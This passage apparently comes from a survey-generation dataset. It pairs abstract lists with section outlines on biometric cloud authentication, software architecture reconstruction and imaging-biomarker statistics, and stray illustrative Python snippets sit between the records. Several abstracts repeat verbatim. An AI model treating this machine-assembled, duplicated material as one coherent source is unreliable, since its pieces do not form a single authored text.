synchronized clock is required between the user and the remote server. In our scheme, it does not require synchronized clocks between two entities because we use random numbers in place of timestamps. --- paper_title: Blind Authentication: A Secure Crypto-Biometric Verification Protocol paper_content: Concerns on widespread use of biometric authentication systems are primarily centered around template security, revocability, and privacy. The use of cryptographic primitives to bolster the authentication process can alleviate some of these concerns as shown by biometric cryptosystems. In this paper, we propose a provably secure and blind biometric authentication protocol, which addresses the concerns of user's privacy, template protection, and trust issues. The protocol is blind in the sense that it reveals only the identity, and no additional information about the user or the biometric to the authenticating server or vice-versa. As the protocol is based on asymmetric encryption of the biometric data, it captures the advantages of biometric authentication as well as the security of public key cryptography. 
The authentication protocol can run over public networks and provide nonrepudiable identity verification. The encryption also provides template protection, the ability to revoke enrolled templates, and alleviates the concerns on privacy in widespread use of biometrics. The proposed approach makes no restrictive assumptions on the biometric data and is hence applicable to multiple biometrics. Such a protocol has significant advantages over existing biometric cryptosystems, which use a biometric to secure a secret key, which in turn is used for authentication. We analyze the security of the protocol under various attack scenarios. Experimental results on four biometric datasets (face, iris, hand geometry, and fingerprint) show that carrying out the authentication in the encrypted domain does not affect the accuracy, while the encryption key acts as an additional layer of security. --- paper_title: Security performance evaluation for biometric template protection techniques paper_content: Biometric template protection techniques are able to provide a solution for vulnerability which compromises biometric template. These are expected to be useful for remote biometric authentication. However, there were no supported standard evaluation method, thus making these technology not fully trusted. The draft Recommendation ITU-T X.gep: 'A guideline for evaluating telebiometric template protection techniques' which is currently under development at ITU-T SG 17 Question 9 (telebiometrics) aims to fill this need. ITU-T X.gep describes a general guideline for testing and reporting the performance of biometric template protection techniques based on biometric cryptosystem and cancellable biometrics. This guideline specifies two reference models for evaluation which use biometric template protection techniques in telebiometrics system. Then, it defines the metrics, procedures, and requirements for testing and evaluating the performance of the biometric template protection techniques. In addition, this Recommendation ITU-T X.gep has been approved at April 2012, and pre-published as ITU-T X.1091. --- paper_title: Generating Cancelable Fingerprint Templates paper_content: Biometrics-based authentication systems offer obvious usability advantages over traditional password and token-based authentication schemes. However, biometrics raises several privacy concerns. A biometric is permanently associated with a user and cannot be changed. Hence, if a biometric identifier is compromised, it is lost forever and possibly for every application where the biometric is used. Moreover, if the same biometric is used in multiple applications, a user can potentially be tracked from one application to the next by cross-matching biometric databases. In this paper, we demonstrate several methods to generate multiple cancelable identifiers from fingerprint images to overcome these problems. In essence, a user can be given as many biometric identifiers as needed by issuing a new transformation "key". The identifiers can be cancelled and replaced when compromised. We empirically compare the performance of several algorithms such as Cartesian, polar, and surface folding transformations of the minutiae positions. It is demonstrated through multiple experiments that we can achieve revocability and prevent cross-matching of biometric databases. 
It is also shown that the transforms are noninvertible by demonstrating that it is computationally as hard to recover the original biometric identifier from a transformed version as by randomly guessing. Based on these empirical results and a theoretical analysis we conclude that feature-level cancelable biometric construction is practicable in large biometric deployments --- paper_title: A Generic Framework for Three-Factor Authentication: Preserving Security and Privacy in Distributed Systems paper_content: As part of the security within distributed systems, various services and resources need protection from unauthorized use. Remote authentication is the most commonly used method to determine the identity of a remote client. This paper investigates a systematic approach for authenticating clients by three factors, namely password, smart card, and biometrics. A generic and secure framework is proposed to upgrade two-factor authentication to three-factor authentication. The conversion not only significantly improves the information assurance at low cost but also protects client privacy in distributed systems. In addition, our framework retains several practice-friendly properties of the underlying two-factor authentication, which we believe is of independent interest. --- paper_title: Robust elliptic curve cryptography-based three factor user authentication providing privacy of biometric data paper_content: Recently, to achieve privacy protection using biometrics, Fan and Lin proposed a three-factor authentication scheme based on password, smart card and biometrics. However, the authors have found that Fan and Lin's proposed scheme (i) has flaws in the design of biometrics privacy, (ii) fails to maintain a verification table, making it vulnerable to stolen-verifier attack and modification attack, and (iii) is vulnerable to insider attacks. Thus, the authors propose an elliptic curve cryptography-based authentication scheme that is improved with regard to security requirements. The authors’ proposed scheme overcomes the flaws of Fan and Lin's scheme and is secured from attacks. Furthermore, the authors have presented a security analysis of their scheme to show that their scheme is suitable for the biometric systems. --- paper_title: Generating Cancelable Fingerprint Templates paper_content: Biometrics-based authentication systems offer obvious usability advantages over traditional password and token-based authentication schemes. However, biometrics raises several privacy concerns. A biometric is permanently associated with a user and cannot be changed. Hence, if a biometric identifier is compromised, it is lost forever and possibly for every application where the biometric is used. Moreover, if the same biometric is used in multiple applications, a user can potentially be tracked from one application to the next by cross-matching biometric databases. In this paper, we demonstrate several methods to generate multiple cancelable identifiers from fingerprint images to overcome these problems. In essence, a user can be given as many biometric identifiers as needed by issuing a new transformation "key". The identifiers can be cancelled and replaced when compromised. We empirically compare the performance of several algorithms such as Cartesian, polar, and surface folding transformations of the minutiae positions. It is demonstrated through multiple experiments that we can achieve revocability and prevent cross-matching of biometric databases. 
It is also shown that the transforms are noninvertible by demonstrating that it is computationally as hard to recover the original biometric identifier from a transformed version as by randomly guessing. Based on these empirical results and a theoretical analysis we conclude that feature-level cancelable biometric construction is practicable in large biometric deployments ---
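The BioHashing scheme summarized in the references above builds a compact binary code from iterated inner products between a tokenised pseudo-random sequence and a fixed-length biometric feature vector, so that losing the token revokes the code. The snippet below is a minimal illustrative sketch of that idea in Python/NumPy only; it is not the cited authors' implementation, and the feature length, code length, threshold, and seeds are arbitrary assumptions.

```python
import numpy as np

def biohash(feature_vec, token_seed, code_bits=64, threshold=0.0):
    """Minimal BioHashing-style sketch: project a fixed-length biometric
    feature vector onto token-derived pseudo-random directions and
    binarise the inner products.  Illustrative only."""
    rng = np.random.default_rng(token_seed)          # token = seed of the user's random data
    # Pseudo-random directions drawn from the token; orthonormalising them
    # (as described in the scheme) reduces correlation between code bits.
    basis, _ = np.linalg.qr(rng.standard_normal((len(feature_vec), code_bits)))
    projections = feature_vec @ basis                # iterated inner products
    return (projections > threshold).astype(np.uint8)

def hamming_distance(code_a, code_b):
    return int(np.count_nonzero(code_a != code_b))

# Toy usage: the same feature with the same token gives nearly identical codes,
# while revoking the token (new seed) yields an uncorrelated code.
feat = np.random.default_rng(1).standard_normal(128)   # stand-in for a wavelet/FMT feature
enrolled = biohash(feat, token_seed=42)
query    = biohash(feat + 0.05 * np.random.default_rng(2).standard_normal(128), token_seed=42)
revoked  = biohash(feat, token_seed=99)
print(hamming_distance(enrolled, query), hamming_distance(enrolled, revoked))
```

In this sketch revocation simply means issuing a new token seed, which mirrors the "change the user specific credential by changing the token" property claimed for the scheme.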
Title: A Survey of Security and Privacy Issues for Biometrics Based Remote Authentication in Cloud Section 1: Introduction Description 1: Provide a general overview of the increasing volume of digital content, the benefits and challenges of cloud environments, and highlight the importance of secure remote user authentication using biometrics. Section 2: Security Challenges Faced by Biometrics Techniques Description 2: Discuss the various security threats and challenges associated with biometrics features, including spoofing attacks, false detection, and limitations in data acquisition technologies. Section 3: Literature Survey Description 3: Offer a detailed review of existing works on cloud security and remote authentication, focusing on singular and multimodal biometrics features and additional security measures to protect biometrics templates. Section 4: Authentication Based on Singular Biometrics Features Description 4: Elaborate on various biometrics-based authentication techniques in the cloud such as fingerprint verification, keystroke analysis, and ECG-based authentication, along with their respective strengths and weaknesses. Section 5: Authentication Systems with Encrypted Biometrics Features Description 5: Describe different methods of protecting biometrics templates through encryption and transformation techniques, and discuss multi-factor authentication systems that enhance security and privacy. Section 6: Analysis Description 6: Present a comparative analysis of different biometrics traits based on performance metrics like true acceptance rate and true rejection rate, and discuss the trade-off between security and privacy in these systems. Section 7: Open Issues Description 7: Identify and describe several research gaps and future directions for creating effective frameworks that balance security and privacy, energy-efficient multimodal biometrics schemes, and cost-effective means for recording biometrics features. Section 8: Conclusion Description 8: Summarize the importance of secure remote authentication in cloud environments, highlight the findings of the survey, and emphasize the need for further research to improve biometrics-based authentication systems.
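Several of the cited schemes, and the outline's analysis section, compare biometric systems through false acceptance rate (FAR), false rejection rate (FRR), and the equal error rate (EER). The sketch below shows one generic way such rates can be estimated from genuine and impostor match scores; the score distributions, threshold sweep, and crossover approximation are stated assumptions for illustration, not the evaluation protocol of any cited system.

```python
import numpy as np

def far_frr_eer(genuine_scores, impostor_scores):
    """Sweep a decision threshold over similarity scores and report the
    operating point where false acceptance and false rejection rates cross.
    Assumes higher score = better match; purely illustrative."""
    thresholds = np.unique(np.concatenate([genuine_scores, impostor_scores]))
    best = None
    for t in thresholds:
        frr = np.mean(genuine_scores < t)      # genuine users wrongly rejected
        far = np.mean(impostor_scores >= t)    # impostors wrongly accepted
        gap = abs(far - frr)
        if best is None or gap < best[0]:
            best = (gap, t, far, frr)
    _, t, far, frr = best
    return t, far, frr, (far + frr) / 2.0      # EER approximated at the crossover

# Toy usage with synthetic score distributions.
rng = np.random.default_rng(0)
genuine = rng.normal(0.8, 0.1, 1000)
impostor = rng.normal(0.4, 0.1, 1000)
threshold, far, frr, eer = far_frr_eer(genuine, impostor)
print(f"threshold={threshold:.3f}  FAR={far:.3%}  FRR={frr:.3%}  EER~{eer:.3%}")
```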
Software Architecture Reconstruction Method, a Survey
11
--- paper_title: Software architecture reconstruction: An approach based on combining graph clustering and partitioning paper_content: This article proposes an approach of improving the accuracy of automatic software architecture reconstruction. Many research uses clustering for the purpose of architectural reconstruction. Our work improves the results of coupling/cohesion driven clustering by combining it with a partitioning preprocessing that establishes a layering of the classes of the system. Two simple and not really efficient algorithms for software clustering are improved by applying this approach, as it is shown in the validation section. --- paper_title: Moving towards quality attribute driven software architecture reconstruction paper_content: There are many good reasons why organizations should perform software architecture reconstructions. However, few organizations are willing to pay for the effort. --- paper_title: Software Architecture Reconstruction: A Process-Oriented Taxonomy paper_content: To maintain and understand large applications, it is important to know their architecture. The first problem is that unlike classes and packages, architecture is not explicitly represented in the code. The second problem is that successful applications evolve over time, so their architecture inevitably drifts. Reconstructing the architecture and checking whether it is still valid is therefore an important aid. While there is a plethora of approaches and techniques supporting architecture reconstruction, there is no comprehensive software architecture reconstruction state of the art and it is often difficult to compare the approaches.
This paper presents a state of the art in software architecture reconstruction approaches. --- paper_title: Software Architecture Reconstruction: A Process-Oriented Taxonomy paper_content: To maintain and understand large applications, it is important to know their architecture. The first problem is that unlike classes and packages, architecture is not explicitly represented in the code. The second problem is that successful applications evolve over time, so their architecture inevitably drifts. Reconstructing the architecture and checking whether it is still valid is therefore an important aid. While there is a plethora of approaches and techniques supporting architecture reconstruction, there is no comprehensive software architecture reconstruction state of the art and it is often difficult to compare the approaches. This paper presents a state of the art in software architecture reconstruction approaches. --- paper_title: CaCOphoNy: metamodel-driven software architecture reconstruction paper_content: Far too often, architecture descriptions of existing software systems are out of sync with the implementation. If they are, they must be reconstructed, but this is a very challenging task. The first problem to be solved is to define what "software architecture" means in the company. The answer can greatly vary, especially among the many stakeholders. In order to solve this problem, this work presents CaCOphoNy, a generic metamodel-driven process for reconstructing software architecture. This work provides a methodological guide and shows how metamodels can be used (1) to define architectural viewpoints, (2) to link these viewpoints to existing metaware and (3) to drive architecture reconstruction processes. The concepts presented were identified over the last decade in the context of Dassault Systemes, one of the largest software companies in Europe, with more than 1200 developers. CaCOphoNy is however a very generic process pattern, and as such it can be applied in many other contexts. This process pattern is in line with the MDA and ADM approaches from the OMG. It also complies with the IEEE Standard 1471 for software architecture. A megamodel integrating these standards is presented. --- paper_title: Software Architecture Reconstruction: A Process-Oriented Taxonomy paper_content: To maintain and understand large applications, it is important to know their architecture. The first problem is that unlike classes and packages, architecture is not explicitly represented in the code. The second problem is that successful applications evolve over time, so their architecture inevitably drifts. Reconstructing the architecture and checking whether it is still valid is therefore an important aid. While there is a plethora of approaches and techniques supporting architecture reconstruction, there is no comprehensive software architecture reconstruction state of the art and it is often difficult to compare the approaches. This paper presents a state of the art in software architecture reconstruction approaches. --- paper_title: Moving towards quality attribute driven software architecture reconstruction paper_content: There are many good reasons why organizations should perform software architecture reconstructions. However, few organizations are willing to pay for the effort.
Software architecture reconstruction must be viewed not as an effort on its own but as a contribution in a broader technical context, such as the streamlining of products into a product line or the modernization of systems that hit their architectural borders. In these contexts software architects frequently need to reason about existing systems, for example to lower adoption and technical barriers for new technology approaches. We propose a Quality Attribute Driven Software Architecture Reconstruction (QADSAR) approach where this kind of reasoning is driven by the analysis of quality attribute scenarios. This paper introduces a quality attribute driven perspective on software architecture reconstruction. It presents a technical reasoning framework and illuminates the information that is required from the reconstruction process to link the knowledge gained back to the business goals of an organization. The paper illustrates the techniques by presenting a real-world case study. --- paper_title: Software Architecture in Practice paper_content: The award-winning and highly influential Software Architecture in Practice, Third Edition, has been substantially revised to reflect the latest developments in the field. In a real-world setting, the book once again introduces the concepts and best practices of software architecture: how a software system is structured and how that system's elements are meant to interact. Distinct from the details of implementation, algorithm, and data representation, an architecture holds the key to achieving system quality, is a reusable asset that can be applied to subsequent systems, and is crucial to a software organization's business strategy. The authors have structured this edition around the concept of architecture influence cycles. Each cycle shows how architecture influences, and is influenced by, a particular context in which architecture plays a critical role. Contexts include technical environment, the life cycle of a project, an organization's business profile, and the architect's professional practices. The authors also have greatly expanded their treatment of quality attributes, which remain central to their architecture philosophy, with an entire chapter devoted to each attribute, and broadened their treatment of architectural patterns. If you design, develop, or manage large software systems (or plan to do so), you will find this book to be a valuable resource for getting up to speed on the state of the art. Totally new material covers: contexts of software architecture (technical, project, business, and professional); architecture competence, both for individuals and organizations; the origins of business goals and how this affects architecture; architecturally significant requirements, and how to determine them; architecture in the life cycle, including generate-and-test as a design philosophy, architecture conformance during implementation, architecture and testing, and architecture and agile development; and architecture and current technologies, such as the cloud, social networks, and end-user devices. --- paper_title: Moving towards quality attribute driven software architecture reconstruction paper_content: There are many good reasons why organizations should perform software architecture reconstructions. However, few organizations are willing to pay for the effort.
Software architecture reconstruction must be viewed not as an effort on its own but as a contribution in a broader technical context, such as the streamlining of products into a product line or the modernization of systems that hit their architectural borders. In these contexts software architects frequently need to reason about existing systems, for example to lower adoption and technical barriers for new technology approaches. We propose a Quality Attribute Driven Software Architecture Reconstruction (QADSAR) approach where this kind of reasoning is driven by the analysis of quality attribute scenarios. This paper introduces a quality attribute driven perspective on software architecture reconstruction. It presents a technical reasoning framework and illuminates the information that is required from the reconstruction process to link the knowledge gained back to the business goals of an organization. The paper illustrates the techniques by presenting a real-world case study. --- paper_title: Software Architecture Reconstruction: A Process-Oriented Taxonomy paper_content: To maintain and understand large applications, it is important to know their architecture. The first problem is that unlike classes and packages, architecture is not explicitly represented in the code. The second problem is that successful applications evolve over time, so their architecture inevitably drifts. Reconstructing the architecture and checking whether it is still valid is therefore an important aid. While there is a plethora of approaches and techniques supporting architecture reconstruction, there is no comprehensive software architecture reconstruction state of the art and it is often difficult to compare the approaches. This paper presents a state of the art in software architecture reconstruction approaches. --- paper_title: Software architecture reconstruction: An approach based on combining graph clustering and partitioning paper_content: This article proposes an approach of improving the accuracy of automatic software architecture reconstruction. Many research uses clustering for the purpose of architectural reconstruction. Our work improves the results of coupling/cohesion driven clustering by combining it with a partitioning preprocessing that establishes a layering of the classes of the system. Two simple and not really efficient algorithms for software clustering are improved by applying this approach, as it is shown in the validation section. ---
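The clustering-based reconstruction work cited above groups classes so that intra-cluster dependencies (cohesion) are high and inter-cluster dependencies (coupling) are low. The sketch below shows one simple greedy agglomerative variant of that idea over a toy class dependency graph; the dependency data and the quality measure are illustrative assumptions, not the algorithm of any specific cited paper.

```python
from itertools import combinations

def cluster_quality(clusters, deps):
    """Crude cohesion/coupling score: internal edges minus external edges,
    normalised by total edges.  Illustrative, not a published metric."""
    internal = external = 0
    membership = {c: i for i, cluster in enumerate(clusters) for c in cluster}
    for src, dst in deps:
        if membership[src] == membership[dst]:
            internal += 1
        else:
            external += 1
    total = internal + external
    return (internal - external) / total if total else 0.0

def greedy_agglomerate(classes, deps, target_clusters):
    """Start with one cluster per class and repeatedly merge the pair of
    clusters that most improves the cohesion/coupling score."""
    clusters = [{c} for c in classes]
    while len(clusters) > target_clusters:
        best_pair, best_score = None, None
        for i, j in combinations(range(len(clusters)), 2):
            trial = [c for k, c in enumerate(clusters) if k not in (i, j)]
            trial.append(clusters[i] | clusters[j])
            score = cluster_quality(trial, deps)
            if best_score is None or score > best_score:
                best_pair, best_score = (i, j), score
        i, j = best_pair
        merged = clusters[i] | clusters[j]
        clusters = [c for k, c in enumerate(clusters) if k not in (i, j)] + [merged]
    return clusters

# Toy dependency graph: (caller, callee) pairs between classes.
deps = [("A", "B"), ("B", "A"), ("A", "C"), ("D", "E"), ("E", "D"), ("C", "D")]
print(greedy_agglomerate(["A", "B", "C", "D", "E"], deps, target_clusters=2))
```

A layering step such as the one described in the cited approach could be run before this kind of clustering so that merges are only considered within a layer, but that preprocessing is not shown here.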
Title: Software Architecture Reconstruction Method, a Survey Section 1: INTRODUCTION Description 1: This section provides an overview of the necessity for software architecture reconstruction, the problems that arise with old software systems, and the iterative process of reconstruction. Section 2: LITERATURE REVIEW Description 2: This section presents an extended review of existing research on software architecture reconstruction, including terminology, factors leading to reconstruction, and techniques used. Section 3: Bottom up Techniques Description 3: This section describes the bottom-up technique for gathering information from lower levels, tools like ARMIN and Rigi used for this purpose, and the visualization of reconstructed views. Section 4: Top down approaches Description 4: This section explains the top-down approaches which start with high-level knowledge and verify it against the source code. Section 5: Hybrid approaches Description 5: This section discusses hybrid approaches that combine top-down and bottom-up methods, highlighting tools like Cacophony, Symphony, and Nimeta. Section 6: SOFTWARE QUALITY ATTRIBUTES Description 6: This section delves into the importance of quality attributes in software architecture, determining their influence on software features, and how they can be supported or conflicted. Section 7: QUALITY ATTRIBUTES DRIVEN SOFTWARE ARCHITECTURE RECONSTRUCTION Description 7: This section introduces a framework for quality attribute-driven architecture reconstruction and discusses application contexts and scenarios. Section 8: INTERFACE IDENTIFICATION Description 8: This section covers reverse engineering techniques for identifying software interfaces by analyzing source code. Section 9: CLUSTER BASED ARCHITECTURE RECONSTRUCTION Description 9: This section explains clustering approaches in software systems, the types of clustering algorithms, and their applications. Section 10: COMPARATIVE ANALYSIS Description 10: This section provides a comparative analysis of top-down, bottom-up, and hybrid approaches, including their advantages and drawbacks. Section 11: CONCLUSION Description 11: This section summarizes the findings of the survey, concludes that the bottom-up approach is most appropriate, and suggests future work with tools like ARMIN.
Quantitative imaging biomarkers: A review of statistical methods for computer algorithm comparisons
13
--- paper_title: The emerging science of quantitative imaging biomarkers terminology and definitions for scientific studies and regulatory submissions paper_content: The development and implementation of quantitative imaging biomarkers has been hampered by the inconsistent and often incorrect use of terminology related to these markers. Sponsored by the Radiological Society of North America, an interdisciplinary group of radiologists, statisticians, physicists, and other researchers worked to develop a comprehensive terminology to serve as a foundation for quantitative imaging biomarker claims. Where possible, this working group adapted existing definitions derived from national or international standards bodies rather than invent new definitions for these terms. This terminology also serves as a foundation for the design of studies that evaluate the technical performance of quantitative imaging biomarkers and for studies of algorithms that generate the quantitative imaging biomarkers from clinical scans. This paper provides examples of research studies and quantitative imaging biomarker claims that use terminology consistent with these definitions as well as examples... --- paper_title: The FDA Critical Path Initiative and Its Influence on New Drug Development paper_content: Societal expectations about drug safety and efficacy are rising while productivity in the pharmaceutical industry is falling. In 2004, the US Food and Drug Administration introduced the Critical Path Initiative with the intent of modernizing drug development by incorporating recent scientific advances, such as genomics and advanced imaging technologies, into the process. An important part of the initiative is the use of public-private partnerships and consortia to accomplish the needed research. This article explicates the reasoning behind the Critical Path Initiative and discusses examples of successful consortia. --- paper_title: A Collaborative Enterprise for Multi-Stakeholder Participation in the Advancement of Quantitative Imaging paper_content: We have formed the Quantitative Imaging Biomarker Alliance to enable cooperation and address issues in quantitative medical imaging by adapting the successful Integrating the Healthcare Enterprise precedent to the needs of imaging science. --- paper_title: Reproducibility of Standardized Uptake Value Measurements Determined by 18F-FDG PET in Malignant Tumors paper_content: 18 F-FDG PET is increasingly being used to monitor the early response of malignant tumors to chemotherapy. Understanding the reproducibility of standardized uptake values (SUVs) is an important prerequisite in estimating what constitutes a significant change. Methods: Twenty-six patients were studied on 2 separate occasions (mean interval ± SD, 3 ± 2 d; range, 1-5 d). A static PET/CT scan was performed 94 ± 9 min after the intravenous injection of 383 ± 15 MBq of 18 F-FDG. Mean and maximum SUVs (SUV mean and SUV max , respectively) were determined for regions of interest drawn around the tumor on the first study and for the same regions of interest transferred to the second study. Results: SUV mean in tumors ranged from 1.49 to 17.48 and SUV max ranged from 2.99 to 24.09. The correlation between SUV mean determined on the 2 separate visits was 0.99; the mean difference between the 2 measurements was 0.01 ± 0.27 SUV. The 95% confidence limits for the measurements were ±0.53. For SUV max , the mean difference was -0.05 ± 1.14 SUV. 
Conclusion: Our study demonstrates that repeated measurements of SUV mean performed a few days apart are highly reproducible. A decrease of 0.5 in the SUV is statistically significant. --- paper_title: Reproducibility of Metabolic Measurements in Malignant Tumors Using FDG PET paper_content: PET using 18 F-fluorodeoxyglucose (FDG) is increasingly applied to monitor the response of malignant tumors to radiotherapy and chemotherapy. The aim of this study was to assess the reproducibility of serial FDG PET measurements to define objective criteria for the evaluation of treatment-induced changes. Methods : Sixteen patients participating in phase I studies of novel antineoplastic compounds were examined twice by FDG PET within 10 d while they were receiving no therapy. Standardized uptake values (SUVs), FDG net influx constants (K i ), glucose normalized SUVs (SUV gluc ) and influx constants (K i,gluc ) were determined for 50 separate lesions. The precision of repeated measurements was determined on a lesion-by-lesion and a patient-by-patient basis. Results: None of the parameters showed a significant increase or decrease at the two examinations. The differences of repeated measurements were approximately normally distributed for all parameters with an SD of the mean percentage difference of about 10%. The 95% normal ranges for spontaneous fluctuations of SUV, SUV gluc , K i and K i,gluc were determined to be ±0.91, ±1.14, ±0.52 mL/100 g/min and ±0.64 mU100 g/min, respectively. Analysis on a lesion-by-lesion basis yielded similar results. Conclusion: FDG PET provides several highly reproducible quantitative parameters of tumor glucose metabolism. Changes of a parameter that are outside the 95% normal range determined in this study may be used to define a metabolic response to therapy. --- paper_title: The Lung Image Database Consortium (LIDC) and Image Database Resource Initiative (IDRI): a completed reference database of lung nodules on CT scans. paper_content: PURPOSE ::: The development of computer-aided diagnostic (CAD) methods for lung nodule detection, classification, and quantitative assessment can be facilitated through a well-characterized repository of computed tomography (CT) scans. The Lung Image Database Consortium (LIDC) and Image Database Resource Initiative (IDRI) completed such a database, establishing a publicly available reference for the medical imaging research community. Initiated by the National Cancer Institute (NCI), further advanced by the Foundation for the National Institutes of Health (FNIH), and accompanied by the Food and Drug Administration (FDA) through active participation, this public-private partnership demonstrates the success of a consortium founded on a consensus-based process. ::: ::: ::: METHODS ::: Seven academic centers and eight medical imaging companies collaborated to identify, address, and resolve challenging organizational, technical, and clinical issues to provide a solid foundation for a robust database. The LIDC/IDRI Database contains 1018 cases, each of which includes images from a clinical thoracic CT scan and an associated XML file that records the results of a two-phase image annotation process performed by four experienced thoracic radiologists. In the initial blinded-read phase, each radiologist independently reviewed each CT scan and marked lesions belonging to one of three categories ("nodule > or =3 mm," "nodule <3 mm," and "non-nodule > or =3 mm"). 
In the subsequent unblinded-read phase, each radiologist independently reviewed their own marks along with the anonymized marks of the three other radiologists to render a final opinion. The goal of this process was to identify as completely as possible all lung nodules in each CT scan without requiring forced consensus. ::: ::: ::: RESULTS ::: The Database contains 7371 lesions marked "nodule" by at least one radiologist. 2669 of these lesions were marked "nodule > or =3 mm" by at least one radiologist, of which 928 (34.7%) received such marks from all four radiologists. These 2669 lesions include nodule outlines and subjective nodule characteristic ratings. ::: ::: ::: CONCLUSIONS ::: The LIDC/IDRI Database is expected to provide an essential medical imaging research resource to spur CAD development, validation, and dissemination in clinical practice. --- paper_title: Variance of SUVs for FDG-PET/CT is greater in clinical practice than under ideal study settings. paper_content: PURPOSE ::: Measurement variance affects the clinical effectiveness of PET-based measurement as a semiquantitative imaging biomarker for cancer response in individual patients and for planning clinical trials. In this study, we measured test-retest reproducibility of SUV measurements under clinical practice conditions and recorded recognized deviations from protocol compliance. ::: ::: ::: METHODS ::: Instrument performance calibration, display, and analyses conformed to manufacture recommendations. Baseline clinical (18)F-FDG PET/CT examinations were performed and then repeated at 1 to 7 days. Intended scan initiation uptake period was to repeat the examinations at the same time for each study after injection of 12 mCi FDG tracer. Avidity of uptake was measured in 62 tumors in 21 patients as SUV for maximum voxel (SUV(max)) and for a mean of sampled tumor voxels (SUV(mean)). ::: ::: ::: RESULTS ::: The range of SUV(max) and SUV(mean) was 1.07 to 21.47 and 0.91 to 14.69, respectively. Intraclass correlation coefficient between log of SUV(max) and log of SUV(mean) was 0.93 (95% confidence interval [CI], 0.88-0.95) and 0.92 (95% CI, 0.87-0.95), respectively.Correlation analysis failed to show an effect on uptake period variation on SUV measurements between the 2 examinations, suggesting additional sources of noise.The threshold criteria for relative difference from baseline for the 95% CI were ± 49% or ± 44% for SUV(max) or SUV(mean), respectively. ::: ::: ::: CONCLUSIONS ::: Variance of SUV for FDG-PET/CT in current clinical practice in a single institution was greater than expected when compared with benchmarks reported under stringent efficacy study settings. Under comparable clinical practice conditions, interpretation of changes in tumor avidity in individuals and assumptions in planning clinical trials may be affected. --- paper_title: Lung cancer: reproducibility of quantitative measurements for evaluating 2-[F-18]-fluoro-2-deoxy-D-glucose uptake at PET. paper_content: PURPOSE ::: To study the precision of repeated 2-[fluorine-18]-fluoro-2-deoxy-D-glucose (FDG) uptake measurements at positron emission tomography (PET) in patients with primary lung cancer. ::: ::: ::: MATERIALS AND METHODS ::: Ten patients with untreated lung cancer underwent two dynamic FDG PET examinations after a 4-hour fast within 1 week. Kinetic modeling of tumor FDG uptake was performed on the basis of a three-compartment model. 
The tumor concentration of F-18 (standardized uptake value calculated on the basis of predicted lean body mass [SUV-lean]) was also measured 50-60 minutes after injection of a tracer. Blood glucose, insulin, and free fatty acid levels were monitored. ::: ::: ::: RESULTS ::: SUV-lean and the FDG influx constant Ki were measured with a mean +/- standard deviation difference of 10% +/- 7 and 10% +/- 8, respectively, over repeated PET scans. The mean difference was reduced to 6% +/- 6 and 6% +/- 5 by multiplying SUV-lean and Ki by plasma glucose concentration. ::: ::: ::: CONCLUSION ::: SUV-lean and graphical Ki can be measured reproducibly, supporting their use in quantitative FDG PET algorithms. --- paper_title: Reproducibility of Common Semi-quantitative Parameters for Evaluating Lung Cancer Glucose Metabolism with Positron Emission Tomography using 2-Deoxy-2-[18F]Fluoro-D-Glucose paper_content: Abstract Purpose: Positron emission tomography (PET) with 2-deoxy-2-[ 18 F]fluoro-D-glucose (FDG) has been used for various cancers, but reproducibility of common utilized semi-quantitative parameters, such as the maximal single pixel standardized uptake value (SUV) and effective glycolytic volume (EGV), remains unknown. Knowledge of precision is essential for applying these parameters to treatment monitoring. The purpose of this investigation was to assess the precision of PET results obtained by repeated examinations of patients with untreated lung cancer. Patients and Methods: Ten patients with lung cancer underwent two PET examinations within a week with no intervening treatment. The reproducibility of three parameters:((1) maximal SUV of 1 × 1 pixel anywhere in the tumor, calculated on the basis of predicted lean body mass [SULmax]; (2) highest average SUV at 4 × 4 pixels in the tumor adjusted by predicted lean body mass [SULmean]; and (3) EGV calculated by multiplying SUL by tumor volume), using PET images obtained at 50–60 min post-injection, were examined. Plasma glucose, insulin and free fatty acid levels were also monitored. Results: The SULmax, SULmean, and EGV were measured with a mean ± S.D. difference of 11.3% ± 8.0, 10.1% ± 8.2, and 10.1% ± 8.0%, respectively. By multiplying SUL by plasma glucose concentration, the mean differences were slightly reduced to 7.2% ± 5.8, 6.7% ± 6.2, and 9.5% ± 8.2, respectively. Conclusion: These data indicate that commonly used semi-quantitative indices of glucose metabolism on PET show high reproducibly. This supports their use in sequential quantitative analysis in PET, such as in treatment response monitoring. (Mol Imag Biol 2002;4:171–178) --- paper_title: Reproducibility of Semi-quantitative Parameters in FDG-PET Using Two Different PET Scanners: Influence of Attenuation Correction Method and Examination Interval paper_content: PURPOSE ::: The aim of this study is to evaluate the reproducibility of semi-quantitative parameters obtained from two 2-deoxy-2-[F-18]fluoro-D-glucose-positron emission tomography (FDG-PET) studies using two different PET scanners. ::: ::: ::: METHODS ::: Forty-five patients underwent FDG-PET examination with two different PET scanners on separate days. Two PET images with different attenuation correction method were generated in each patient, and three regions of interest (ROIs) were placed on the lung tumor and normal organs (mediastinum and liver) in each image. 
Mean and maximum standardized uptake values (SUVs), tumor-to-mediastinum and tumor-to-liver ratios (T/M and T/L), and the percentage difference in parameters between two PET images (% Diff.) were compared. ::: ::: ::: RESULTS ::: All measured values except maximum SUV in the liver and tumor-related parameters (SUV in lung tumor, T/M, T/L) showed no significant difference between two PET images. ::: ::: ::: CONCLUSION ::: The mean measured values showed high reproducibility and demonstrate that follow-up study or measurement of tumor response to anticancer drugs can be undertaken by FDG-PET examination without specifying the particular type of PET scanner. --- paper_title: Reproducibility of 18F-FDG and 3'-Deoxy-3'-18F-Fluorothymidine PET Tumor Volume Measurements paper_content: The objective of this study was to establish the repeatability and reproducibility limits of several volume-related PET image-derived indices—namely tumor volume (TV), mean standardized uptake value, total glycolytic volume (TGV), and total proliferative volume (TPV)—relative to those of maximum standardized uptake value (SUV max ), commonly used in clinical practice. Methods: Fixed and adaptive thresholding, fuzzy C-means, and fuzzy locally adaptive Bayesian methodology were considered for TV delineation. Double-baseline 18 F-FDG (17 lesions, 14 esophageal cancer patients) and 3'-deoxy-3'- 18 F-fluorothymidine ( 18 F-FLT) (12 lesions, 9 breast cancer patients) PET scans, acquired at a mean interval of 4 d and before any treatment, were used for reproducibility evaluation. The repeatability of each method was evaluated for the same datasets and compared with manual delineation. Results: A negligible variability of less than 5% was measured for all segmentation approaches in comparison to manual delineation (5%-35%). SUV max reproducibility levels were similar to others previously reported, with a mean percentage difference of 1.8% ± 16.7% and -0.9% ± 14.9% for the 18 F-FDG and 18 F-FLT lesions, respectively. The best TV, TGV, and TPV reproducibility limits ranged from -21% to 31% and -30% to 37% for 18 F-FDG and 18 F-FLT images, respectively, whereas the worst reproducibility limits ranged from -90% to 73% and -68% to 52%, respectively. Conclusion: The reproducibility of estimating TV, mean 